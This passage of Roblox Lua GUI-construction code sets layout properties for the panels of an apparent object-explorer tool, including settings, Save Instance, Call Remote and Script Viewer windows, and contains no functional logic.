NewGuiPart27.FontSize = Enum.FontSize.Size24 NewGuiPart27.Text = "<" NewGuiPart28.Name = "SettingsPanel" NewGuiPart28.Parent = NewGuiPart1 NewGuiPart28.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart28.BackgroundTransparency = 0.10000000149012 NewGuiPart28.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart28.Position = UDim2.new(1, 0, 0, 0) NewGuiPart28.Size = UDim2.new(0, 300, 1, 0) NewGuiPart162.Name = "GetSetting" NewGuiPart162.Parent = NewGuiPart28 NewGuiPart162.Archivable = true NewGuiPart29.Name = "Header" NewGuiPart29.Parent = NewGuiPart28 NewGuiPart29.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart29.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart29.Size = UDim2.new(1, 0, 0, 17) NewGuiPart30.Parent = NewGuiPart29 NewGuiPart30.BackgroundTransparency = 1 NewGuiPart30.Position = UDim2.new(0, 4, 0, 0) NewGuiPart30.Size = UDim2.new(1, -4, 1, 0) NewGuiPart30.Font = Enum.Font.SourceSans NewGuiPart30.FontSize = Enum.FontSize.Size14 NewGuiPart30.Text = "Settings" NewGuiPart30.TextColor3 = Color3.new(0, 0, 0) NewGuiPart30.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart31.Name = "SettingTemplate" NewGuiPart31.Parent = NewGuiPart28 NewGuiPart31.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart31.BackgroundTransparency = 1 NewGuiPart31.Position = UDim2.new(0, 0, 0, 18) NewGuiPart31.Size = UDim2.new(1, 0, 0, 60) NewGuiPart31.Visible = false NewGuiPart32.Name = "SName" NewGuiPart32.Parent = NewGuiPart31 NewGuiPart32.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart32.BackgroundTransparency = 1 NewGuiPart32.Position = UDim2.new(0, 10, 0, 0) NewGuiPart32.Size = UDim2.new(1, -20, 0, 30) NewGuiPart32.Font = Enum.Font.SourceSans NewGuiPart32.FontSize = Enum.FontSize.Size18 NewGuiPart32.Text = "SettingName" NewGuiPart32.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart33.Name = "Status" NewGuiPart33.Parent = NewGuiPart31 NewGuiPart33.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart33.BackgroundTransparency = 1 NewGuiPart33.Position = UDim2.new(0, 60, 0, 30) NewGuiPart33.Size = UDim2.new(0, 50, 0, 15) NewGuiPart33.Font = Enum.Font.SourceSans NewGuiPart33.FontSize = Enum.FontSize.Size18 NewGuiPart33.Text = "Off" NewGuiPart33.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart34.Name = "Change" NewGuiPart34.Parent = NewGuiPart31 NewGuiPart34.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart34.BorderSizePixel = 0 NewGuiPart34.Position = UDim2.new(0, 10, 0, 30) NewGuiPart34.Size = UDim2.new(0, 40, 0, 15) NewGuiPart34.Font = Enum.Font.SourceSans NewGuiPart34.FontSize = Enum.FontSize.Size14 NewGuiPart34.Text = "" NewGuiPart35.Name = "OnBar" NewGuiPart35.Parent = NewGuiPart34 NewGuiPart35.BackgroundColor3 = Color3.new(0, 0.576471, 0.862745) NewGuiPart35.BorderSizePixel = 0 NewGuiPart35.Size = UDim2.new(0, 0, 0, 15) NewGuiPart35.Font = Enum.Font.SourceSans NewGuiPart35.FontSize = Enum.FontSize.Size14 NewGuiPart35.Text = "" NewGuiPart36.Name = "Bar" NewGuiPart36.Parent = NewGuiPart34 NewGuiPart36.BackgroundColor3 = Color3.new(0, 0, 0) NewGuiPart36.BorderSizePixel = 0 NewGuiPart36.ClipsDescendants = true NewGuiPart36.Position = UDim2.new(0, -2, 0, -2) NewGuiPart36.Size = UDim2.new(0, 10, 0, 19) NewGuiPart36.Font = Enum.Font.SourceSans NewGuiPart36.FontSize = Enum.FontSize.Size14 NewGuiPart36.Text = "" NewGuiPart37.Name = "SettingList" NewGuiPart37.Parent = NewGuiPart28 NewGuiPart37.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart37.BackgroundTransparency = 1 NewGuiPart37.Position = UDim2.new(0, 0, 0, 17) NewGuiPart37.Size = UDim2.new(1, 0, 1, -17) NewGuiPart38.Name = "SaveInstance" NewGuiPart38.Parent = NewGuiPart1 NewGuiPart38.Active = true NewGuiPart38.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart38.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart38.Draggable = true NewGuiPart38.Position = UDim2.new(0.300000012, 0, 0.300000012, 0) NewGuiPart38.Size = UDim2.new(0, 350, 0, 20) NewGuiPart38.Visible = false NewGuiPart38.ZIndex = 2 NewGuiPart39.Name = "Title" NewGuiPart39.Parent = NewGuiPart38 NewGuiPart39.BackgroundTransparency = 1 NewGuiPart39.Size = UDim2.new(1, 0, 1, 0) NewGuiPart39.ZIndex = 2 NewGuiPart39.Font = Enum.Font.SourceSans NewGuiPart39.FontSize = Enum.FontSize.Size14 NewGuiPart39.Text = "Save Instance" NewGuiPart39.TextColor3 = Color3.new(0, 0, 0) NewGuiPart39.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart40.Name = "MainWindow" NewGuiPart40.Parent = NewGuiPart38 NewGuiPart40.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart40.BackgroundTransparency = 0.10000000149012 NewGuiPart40.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart40.Size = UDim2.new(1, 0, 0, 200) NewGuiPart41.Name = "Save" NewGuiPart41.Parent = NewGuiPart40 NewGuiPart41.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart41.BackgroundTransparency = 0.5 NewGuiPart41.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart41.Position = UDim2.new(0.075000003, 0, 1, -40) NewGuiPart41.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart41.Font = Enum.Font.SourceSans NewGuiPart41.FontSize = Enum.FontSize.Size18 NewGuiPart41.Text = "Save" NewGuiPart42.Name = "Desc" NewGuiPart42.Parent = NewGuiPart40 NewGuiPart42.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart42.BackgroundTransparency = 1 NewGuiPart42.Position = UDim2.new(0, 0, 0, 20) NewGuiPart42.Size = UDim2.new(1, 0, 0, 40) NewGuiPart42.Font = Enum.Font.SourceSans NewGuiPart42.FontSize = Enum.FontSize.Size14 NewGuiPart42.Text = "This will save an instance to your PC. Type in the name for your instance. (.rbxmx will be added automatically.)" NewGuiPart42.TextWrapped = true NewGuiPart43.Name = "Cancel" NewGuiPart43.Parent = NewGuiPart40 NewGuiPart43.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart43.BackgroundTransparency = 0.5 NewGuiPart43.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart43.Position = UDim2.new(0.524999976, 0, 1, -40) NewGuiPart43.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart43.Font = Enum.Font.SourceSans NewGuiPart43.FontSize = Enum.FontSize.Size18 NewGuiPart43.Text = "Cancel" NewGuiPart44.Name = "FileName" NewGuiPart44.Parent = NewGuiPart40 NewGuiPart44.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart44.BackgroundTransparency = 0.20000000298023 NewGuiPart44.Position = UDim2.new(0.075000003, 0, 0.400000006, 0) NewGuiPart44.Size = UDim2.new(0.850000024, 0, 0, 30) NewGuiPart44.Font = Enum.Font.SourceSans NewGuiPart44.FontSize = Enum.FontSize.Size18 NewGuiPart44.Text = "" NewGuiPart44.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart45.Name = "SaveObjects" NewGuiPart45.Parent = NewGuiPart40 NewGuiPart45.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart45.BackgroundTransparency = 0.60000002384186 NewGuiPart45.Position = UDim2.new(0.075000003, 0, 0.625, 0) NewGuiPart45.Size = UDim2.new(0, 20, 0, 20) NewGuiPart45.ZIndex = 2 NewGuiPart45.Font = Enum.Font.SourceSans NewGuiPart45.FontSize = Enum.FontSize.Size18 NewGuiPart45.Text = "" NewGuiPart45.TextColor3 = Color3.new(1, 1, 1) NewGuiPart46.Name = "enabled" NewGuiPart46.Parent = NewGuiPart45 NewGuiPart46.BackgroundColor3 = Color3.new(0.380392, 0.380392, 0.380392) NewGuiPart46.BackgroundTransparency = 0.40000000596046 NewGuiPart46.BorderSizePixel = 0 NewGuiPart46.Position = UDim2.new(0, 3, 0, 3) NewGuiPart46.Size = UDim2.new(0, 14, 0, 14) NewGuiPart46.Font = Enum.Font.SourceSans NewGuiPart46.FontSize = Enum.FontSize.Size14 NewGuiPart46.Text = "" NewGuiPart47.Name = "Desc2" NewGuiPart47.Parent = NewGuiPart40 NewGuiPart47.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart47.BackgroundTransparency = 1 NewGuiPart47.Position = UDim2.new(0.075000003, 30, 0.625, 0) NewGuiPart47.Size = UDim2.new(0.925000012, -30, 0, 20) NewGuiPart47.Font = Enum.Font.SourceSans NewGuiPart47.FontSize = Enum.FontSize.Size14 NewGuiPart47.Text = "Save \"Object\" type values" NewGuiPart47.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart48.Name = "Confirmation" NewGuiPart48.Parent = NewGuiPart1 NewGuiPart48.Active = true NewGuiPart48.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart48.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart48.Draggable = true NewGuiPart48.Position = UDim2.new(0.300000012, 0, 0.349999994, 0) NewGuiPart48.Size = UDim2.new(0, 350, 0, 20) NewGuiPart48.Visible = false NewGuiPart48.ZIndex = 3 NewGuiPart49.Name = "Title" NewGuiPart49.Parent = NewGuiPart48 NewGuiPart49.BackgroundTransparency = 1 NewGuiPart49.Size = UDim2.new(1, 0, 1, 0) NewGuiPart49.ZIndex = 3 NewGuiPart49.Font = Enum.Font.SourceSans NewGuiPart49.FontSize = Enum.FontSize.Size14 NewGuiPart49.Text = "Confirm" NewGuiPart49.TextColor3 = Color3.new(0, 0, 0) NewGuiPart49.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart50.Name = "MainWindow" NewGuiPart50.Parent = NewGuiPart48 NewGuiPart50.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart50.BackgroundTransparency = 0.10000000149012 NewGuiPart50.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart50.Size = UDim2.new(1, 0, 0, 150) NewGuiPart50.ZIndex = 2 NewGuiPart51.Name = "Yes" NewGuiPart51.Parent = NewGuiPart50 NewGuiPart51.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart51.BackgroundTransparency = 0.5 NewGuiPart51.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart51.Position = UDim2.new(0.075000003, 0, 1, -40) NewGuiPart51.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart51.ZIndex = 2 NewGuiPart51.Font = Enum.Font.SourceSans NewGuiPart51.FontSize = Enum.FontSize.Size18 NewGuiPart51.Text = "Yes" NewGuiPart52.Name = "Desc" NewGuiPart52.Parent = NewGuiPart50 NewGuiPart52.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart52.BackgroundTransparency = 1 NewGuiPart52.Position = UDim2.new(0, 0, 0, 20) NewGuiPart52.Size = UDim2.new(1, 0, 0, 40) NewGuiPart52.ZIndex = 2 NewGuiPart52.Font = Enum.Font.SourceSans NewGuiPart52.FontSize = Enum.FontSize.Size14 NewGuiPart52.Text = "The file, FILENAME, already exists. Overwrite?" NewGuiPart52.TextWrapped = true NewGuiPart53.Name = "No" NewGuiPart53.Parent = NewGuiPart50 NewGuiPart53.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart53.BackgroundTransparency = 0.5 NewGuiPart53.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart53.Position = UDim2.new(0.524999976, 0, 1, -40) NewGuiPart53.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart53.ZIndex = 2 NewGuiPart53.Font = Enum.Font.SourceSans NewGuiPart53.FontSize = Enum.FontSize.Size18 NewGuiPart53.Text = "No" NewGuiPart54.Name = "Caution" NewGuiPart54.Parent = NewGuiPart1 NewGuiPart54.Active = true NewGuiPart54.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart54.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart54.Draggable = true NewGuiPart54.Position = UDim2.new(0.300000012, 0, 0.300000012, 0) NewGuiPart54.Size = UDim2.new(0, 350, 0, 20) NewGuiPart54.Visible = false NewGuiPart54.ZIndex = 5 NewGuiPart55.Name = "Title" NewGuiPart55.Parent = NewGuiPart54 NewGuiPart55.BackgroundTransparency = 1 NewGuiPart55.Size = UDim2.new(1, 0, 1, 0) NewGuiPart55.ZIndex = 5 NewGuiPart55.Font = Enum.Font.SourceSans NewGuiPart55.FontSize = Enum.FontSize.Size14 NewGuiPart55.Text = "Caution" NewGuiPart55.TextColor3 = Color3.new(0, 0, 0) NewGuiPart55.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart56.Name = "MainWindow" NewGuiPart56.Parent = NewGuiPart54 NewGuiPart56.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart56.BackgroundTransparency = 0.10000000149012 NewGuiPart56.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart56.Size = UDim2.new(1, 0, 0, 150) NewGuiPart56.ZIndex = 4 NewGuiPart57.Name = "Desc" NewGuiPart57.Parent = NewGuiPart56 NewGuiPart57.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart57.BackgroundTransparency = 1 NewGuiPart57.Position = UDim2.new(0, 0, 0, 20) NewGuiPart57.Size = UDim2.new(1, 0, 0, 42) NewGuiPart57.ZIndex = 4 NewGuiPart57.Font = Enum.Font.SourceSans NewGuiPart57.FontSize = Enum.FontSize.Size14 NewGuiPart57.Text = "The file, FILENAME, already exists. Overwrite?" NewGuiPart57.TextWrapped = true NewGuiPart58.Name = "Ok" NewGuiPart58.Parent = NewGuiPart56 NewGuiPart58.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart58.BackgroundTransparency = 0.5 NewGuiPart58.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart58.Position = UDim2.new(0.300000012, 0, 1, -40) NewGuiPart58.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart58.ZIndex = 4 NewGuiPart58.Font = Enum.Font.SourceSans NewGuiPart58.FontSize = Enum.FontSize.Size18 NewGuiPart58.Text = "Ok" NewGuiPart59.Name = "CallRemote" NewGuiPart59.Parent = NewGuiPart1 NewGuiPart59.Active = true NewGuiPart59.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart59.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart59.Draggable = true NewGuiPart59.Position = UDim2.new(0.300000012, 0, 0.300000012, 0) NewGuiPart59.Size = UDim2.new(0, 350, 0, 20) NewGuiPart59.Visible = false NewGuiPart59.ZIndex = 2 NewGuiPart60.Name = "Title" NewGuiPart60.Parent = NewGuiPart59 NewGuiPart60.BackgroundTransparency = 1 NewGuiPart60.Size = UDim2.new(1, 0, 1, 0) NewGuiPart60.ZIndex = 2 NewGuiPart60.Font = Enum.Font.SourceSans NewGuiPart60.FontSize = Enum.FontSize.Size14 NewGuiPart60.Text = "Call Remote" NewGuiPart60.TextColor3 = Color3.new(0, 0, 0) NewGuiPart60.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart61.Name = "MainWindow" NewGuiPart61.Parent = NewGuiPart59 NewGuiPart61.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart61.BackgroundTransparency = 0.10000000149012 NewGuiPart61.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart61.Size = UDim2.new(1, 0, 0, 200) NewGuiPart62.Name = "Desc" NewGuiPart62.Parent = NewGuiPart61 NewGuiPart62.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart62.BackgroundTransparency = 1 NewGuiPart62.Position = UDim2.new(0, 0, 0, 20) NewGuiPart62.Size = UDim2.new(1, 0, 0, 20) NewGuiPart62.Font = Enum.Font.SourceSans NewGuiPart62.FontSize = Enum.FontSize.Size14 NewGuiPart62.Text = "Arguments" NewGuiPart62.TextWrapped = true NewGuiPart63.Name = "Arguments" NewGuiPart63.Parent = NewGuiPart61 NewGuiPart63.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart63.BackgroundTransparency = 1 NewGuiPart63.Position = UDim2.new(0, 0, 0, 40) NewGuiPart63.Size = UDim2.new(1, 0, 0, 80) NewGuiPart63.BottomImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart63.CanvasSize = UDim2.new(0, 0, 0, 0) NewGuiPart63.MidImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart63.TopImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart64.Name = "DisplayReturned" NewGuiPart64.Parent = NewGuiPart61 NewGuiPart64.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart64.BackgroundTransparency = 0.60000002384186 NewGuiPart64.Position = UDim2.new(0.075000003, 0, 0.625, 0) NewGuiPart64.Size = UDim2.new(0, 20, 0, 20) NewGuiPart64.ZIndex = 2 NewGuiPart64.Font = Enum.Font.SourceSans NewGuiPart64.FontSize = Enum.FontSize.Size18 NewGuiPart64.Text = "" NewGuiPart64.TextColor3 = Color3.new(1, 1, 1) NewGuiPart65.Name = "enabled" NewGuiPart65.Parent = NewGuiPart64 NewGuiPart65.BackgroundColor3 = Color3.new(0.380392, 0.380392, 0.380392) NewGuiPart65.BackgroundTransparency = 0.40000000596046 NewGuiPart65.BorderSizePixel = 0 NewGuiPart65.Position = UDim2.new(0, 3, 0, 3) NewGuiPart65.Size = UDim2.new(0, 14, 0, 14) NewGuiPart65.Visible = false NewGuiPart65.Font = Enum.Font.SourceSans NewGuiPart65.FontSize = Enum.FontSize.Size14 NewGuiPart65.Text = "" NewGuiPart66.Name = "Desc2" NewGuiPart66.Parent = NewGuiPart61 NewGuiPart66.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart66.BackgroundTransparency = 1 NewGuiPart66.Position = UDim2.new(0.075000003, 30, 0.625, 0) NewGuiPart66.Size = UDim2.new(0.925000012, -30, 0, 20) NewGuiPart66.Font = Enum.Font.SourceSans NewGuiPart66.FontSize = Enum.FontSize.Size14 NewGuiPart66.Text = "Display values returned" NewGuiPart66.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart67.Name = "Add" NewGuiPart67.Parent = NewGuiPart61 NewGuiPart67.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart67.BackgroundTransparency = 0.5 NewGuiPart67.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart67.Position = UDim2.new(0.800000012, 0, 0.625, 0) NewGuiPart67.Size = UDim2.new(0, 20, 0, 20) NewGuiPart67.Font = Enum.Font.SourceSansBold NewGuiPart67.FontSize = Enum.FontSize.Size24 NewGuiPart67.Text = "+" NewGuiPart68.Name = "Subtract" NewGuiPart68.Parent = NewGuiPart61 NewGuiPart68.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart68.BackgroundTransparency = 0.5 NewGuiPart68.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart68.Position = UDim2.new(0.899999976, 0, 0.625, 0) NewGuiPart68.Size = UDim2.new(0, 20, 0, 20) NewGuiPart68.Font = Enum.Font.SourceSansBold NewGuiPart68.FontSize = Enum.FontSize.Size24 NewGuiPart68.Text = "-" NewGuiPart69.Name = "ArgumentTemplate" NewGuiPart69.Parent = NewGuiPart61 NewGuiPart69.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart69.BackgroundTransparency = 0.5 NewGuiPart69.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart69.Size = UDim2.new(1, 0, 0, 20) NewGuiPart69.Visible = false NewGuiPart70.Name = "Type" NewGuiPart70.Parent = NewGuiPart69 NewGuiPart70.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart70.BackgroundTransparency = 0.89999997615814 NewGuiPart70.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart70.Size = UDim2.new(0.400000006, 0, 0, 20) NewGuiPart70.Font = Enum.Font.SourceSans NewGuiPart70.FontSize = Enum.FontSize.Size18 NewGuiPart70.Text = "Script" NewGuiPart71.Name = "Value" NewGuiPart71.Parent = NewGuiPart69 NewGuiPart71.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart71.BackgroundTransparency = 0.89999997615814 NewGuiPart71.Position = UDim2.new(0.400000006, 0, 0, 0) NewGuiPart71.Size = UDim2.new(0.600000024, -12, 0, 20) NewGuiPart71.Font = Enum.Font.SourceSans NewGuiPart71.FontSize = Enum.FontSize.Size14 NewGuiPart71.Text = "" NewGuiPart71.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart72.Name = "Cancel" NewGuiPart72.Parent = NewGuiPart61 NewGuiPart72.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart72.BackgroundTransparency = 0.5 NewGuiPart72.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart72.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart72.Font = Enum.Font.SourceSans NewGuiPart72.FontSize = Enum.FontSize.Size18 NewGuiPart72.Text = "Cancel" NewGuiPart73.Name = "Ok" NewGuiPart73.Parent = NewGuiPart61 NewGuiPart73.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart73.BackgroundTransparency = 0.5 NewGuiPart73.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart73.Position = UDim2.new(0.075000003, 0, 1, -40) NewGuiPart73.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart73.Font = Enum.Font.SourceSans NewGuiPart73.FontSize = Enum.FontSize.Size18 NewGuiPart73.Text = "Call" NewGuiPart74.Name = "TableCaution" NewGuiPart74.Parent = NewGuiPart1 NewGuiPart74.Active = true NewGuiPart74.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart74.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart74.Draggable = true NewGuiPart74.Position = UDim2.new(0.300000012, 0, 0.300000012, 0) NewGuiPart74.Size = UDim2.new(0, 350, 0, 20) NewGuiPart74.Visible = false NewGuiPart74.ZIndex = 2 NewGuiPart75.Name = "MainWindow" NewGuiPart75.Parent = NewGuiPart74 NewGuiPart75.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart75.BackgroundTransparency = 0.10000000149012 NewGuiPart75.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart75.Size = UDim2.new(1, 0, 0, 150) NewGuiPart76.Name = "Ok" NewGuiPart76.Parent = NewGuiPart75 NewGuiPart76.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart76.BackgroundTransparency = 0.5 NewGuiPart76.BorderColor3 = Color3.new(0, 0, 0) NewGuiPart76.Position = UDim2.new(0.300000012, 0, 1, -40) NewGuiPart76.Size = UDim2.new(0.400000006, 0, 0, 30) NewGuiPart76.Font = Enum.Font.SourceSans NewGuiPart76.FontSize = Enum.FontSize.Size18 NewGuiPart76.Text = "Ok" NewGuiPart77.Name = "TableResults" NewGuiPart77.Parent = NewGuiPart75 NewGuiPart77.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart77.BackgroundTransparency = 1 NewGuiPart77.Position = UDim2.new(0, 0, 0, 20) NewGuiPart77.Size = UDim2.new(1, 0, 0, 80) NewGuiPart77.BottomImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart77.CanvasSize = UDim2.new(0, 0, 0, 0) NewGuiPart77.MidImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart77.TopImage = "rbxasset://textures/blackBkg_square.png" NewGuiPart78.Name = "TableTemplate" NewGuiPart78.Parent = NewGuiPart75 NewGuiPart78.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart78.BackgroundTransparency = 0.5 NewGuiPart78.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart78.Size = UDim2.new(1, 0, 0, 20) NewGuiPart78.Visible = false NewGuiPart79.Name = "Type" NewGuiPart79.Parent = NewGuiPart78 NewGuiPart79.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart79.BackgroundTransparency = 0.89999997615814 NewGuiPart79.Size = UDim2.new(0.400000006, 0, 0, 20) NewGuiPart79.Font = Enum.Font.SourceSans NewGuiPart79.FontSize = Enum.FontSize.Size18 NewGuiPart79.Text = "Script" NewGuiPart80.Name = "Value" NewGuiPart80.Parent = NewGuiPart78 NewGuiPart80.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart80.BackgroundTransparency = 0.89999997615814 NewGuiPart80.Position = UDim2.new(0.400000006, 0, 0, 0) NewGuiPart80.Size = UDim2.new(0.600000024, -12, 0, 20) NewGuiPart80.Font = Enum.Font.SourceSans NewGuiPart80.FontSize = Enum.FontSize.Size14 NewGuiPart80.Text = "Script" NewGuiPart81.Name = "Title" NewGuiPart81.Parent = NewGuiPart74 NewGuiPart81.BackgroundTransparency = 1 NewGuiPart81.Size = UDim2.new(1, 0, 1, 0) NewGuiPart81.ZIndex = 2 NewGuiPart81.Font = Enum.Font.SourceSans NewGuiPart81.FontSize = Enum.FontSize.Size14 NewGuiPart81.Text = "Caution" NewGuiPart81.TextColor3 = Color3.new(0, 0, 0) NewGuiPart81.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart82.Name = "ScriptEditor" NewGuiPart82.Parent = NewGuiPart1 NewGuiPart82.Active = true NewGuiPart82.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart82.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart82.Draggable = true NewGuiPart82.Position = UDim2.new(0.300000012, 0, 0.300000012, 0) NewGuiPart82.Size = UDim2.new(0, 516, 0, 20) NewGuiPart82.Visible = false NewGuiPart82.ZIndex = 5 NewGuiPart163.Name = "OpenScript" NewGuiPart163.Parent = NewGuiPart82 NewGuiPart163.Archivable = true NewGuiPart83.Name = "Title" NewGuiPart83.Parent = NewGuiPart82 NewGuiPart83.BackgroundTransparency = 1 NewGuiPart83.Size = UDim2.new(1, 0, 1, 0) NewGuiPart83.ZIndex = 5 NewGuiPart83.Font = Enum.Font.SourceSans NewGuiPart83.FontSize = Enum.FontSize.Size14 NewGuiPart83.Text = "Script Viewer" NewGuiPart83.TextColor3 = Color3.new(0, 0, 0) NewGuiPart83.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart84.Name = "Cover" NewGuiPart84.Parent = NewGuiPart82 NewGuiPart84.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart84.BorderSizePixel = 0 NewGuiPart84.Position = UDim2.new(0, 0, 3, 0) NewGuiPart84.Size = UDim2.new(0, 516, 0, 416) NewGuiPart85.Name = "EditorGrid" NewGuiPart85.Parent = NewGuiPart82 NewGuiPart85.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart85.BorderSizePixel = 0 NewGuiPart85.Position = UDim2.new(0, 0, 3, 0) NewGuiPart85.Size = UDim2.new(0, 500, 0, 400) NewGuiPart86.Name = "TopBar" NewGuiPart86.Parent = NewGuiPart82 NewGuiPart86.BackgroundColor3 = Color3.new(0.941177, 0.941177, 0.941177) NewGuiPart86.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart86.Size = UDim2.new(1, 0, 3, 0) NewGuiPart87.Name = "ScriptBarLeft" NewGuiPart87.Parent = NewGuiPart86 NewGuiPart87.Active = false NewGuiPart87.BackgroundColor3 = Color3.new(0.866667, 0.866667, 0.866667) NewGuiPart87.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart87.Position = UDim2.new(1, -32, 0, 40) NewGuiPart87.Size = UDim2.new(0, 16, 0, 20) NewGuiPart87.AutoButtonColor = false NewGuiPart88.Name = "Arrow Graphic" NewGuiPart88.Parent = NewGuiPart87 NewGuiPart88.BackgroundTransparency = 1 NewGuiPart88.BorderSizePixel = 0 NewGuiPart88.Position = UDim2.new(0.5, -4, 0.5, -4) NewGuiPart88.Size = UDim2.new(0, 8, 0, 8) NewGuiPart89.Name = "Graphic" NewGuiPart89.Parent = NewGuiPart88 NewGuiPart89.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart89.BackgroundTransparency = 0.69999998807907 NewGuiPart89.BorderSizePixel = 0 NewGuiPart89.Position = UDim2.new(0.25, 0, 0.375, 0) NewGuiPart89.Size = UDim2.new(0.125, 0, 0.25, 0) NewGuiPart90.Name = "Graphic" NewGuiPart90.Parent = NewGuiPart88 NewGuiPart90.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart90.BackgroundTransparency = 0.69999998807907 NewGuiPart90.BorderSizePixel = 0 NewGuiPart90.Position = UDim2.new(0.375, 0, 0.25, 0) NewGuiPart90.Size = UDim2.new(0.125, 0, 0.5, 0) NewGuiPart91.Name = "Graphic" NewGuiPart91.Parent = NewGuiPart88 NewGuiPart91.BackgroundColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart91.BackgroundTransparency = 0.69999998807907 NewGuiPart91.BorderSizePixel = 0 NewGuiPart91.Position = UDim2.new(0.5, 0, 0.125, 0) NewGuiPart91.Size = UDim2.new(0.125, 0, 0.75, 0) NewGuiPart92.Name = "Graphic" NewGuiPart92.Parent = 